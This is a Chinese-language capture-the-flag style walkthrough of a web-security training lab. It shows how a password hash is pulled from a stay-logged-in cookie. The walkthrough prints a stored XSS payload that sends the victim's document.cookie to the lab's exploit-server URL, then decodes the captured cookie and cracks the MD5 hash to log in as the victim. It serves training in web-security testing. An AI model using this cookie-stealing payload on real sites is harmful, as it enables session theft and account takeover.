第十关 离线密码破解
这一关就是用户的密码哈希存储在 cookie 中,我们通过插入xss语句,获取cookie,实现受害者登录,然后删除此账号过关
提示:1、用户的密码哈希存储在 Cookie
2、在评论区存在一个 XSS 漏洞
具体操作:
1、在 Burp 运行时,登录wiener账号,勾选保持登录的选项,然后去burp的http history里找到触发的数据包,发现cookie是Base64编码,并且是包含密码的MD5加密的方式(相关操作见第九关)
2、回到首页home(退不退出wiener用户都可以)
往下滑有很多博客,随便找个博客点击进去,里面的评论区容易受到xss攻击,我们需要插入构造的xss恶意语句
先去靶场给的一个攻击机(漏洞利用服务器),点击Go to exploit server前往

3、来这个靶场给的攻击机里复制URL
https://exploit-0a0b001003d3f07c80e42a0201430048.exploit-server.net

4、再回到这个首页home,在评论区插入xss语句,把刚刚复制的攻击机URL也写进去,再点击提交
<script>
document.location="https://exploit-0a0b001003d3f07c80e42a0201430048.exploit-server.net/"+document.cookie;
</script>

跳转到此页面

5、点击前往攻击机,在页面点击查看日志

跳转到日志页面,获取到了cookie
Y2FybG9zOjI2MzIzYzE2ZDVmNGRhYmZmM2JiMTM2ZjI0NjBhOTQz

6、去解码
carlos:26323c16d5f4dabff3bb136f2460a943

7、替换成受害者的cookie,然后复制URL去浏览器访问

结果还是会跳到首页,要输入账号和密码才能登录
8、那我再解密一下
密码:onceuponatime

9、如图登录成功

如图靶场过关
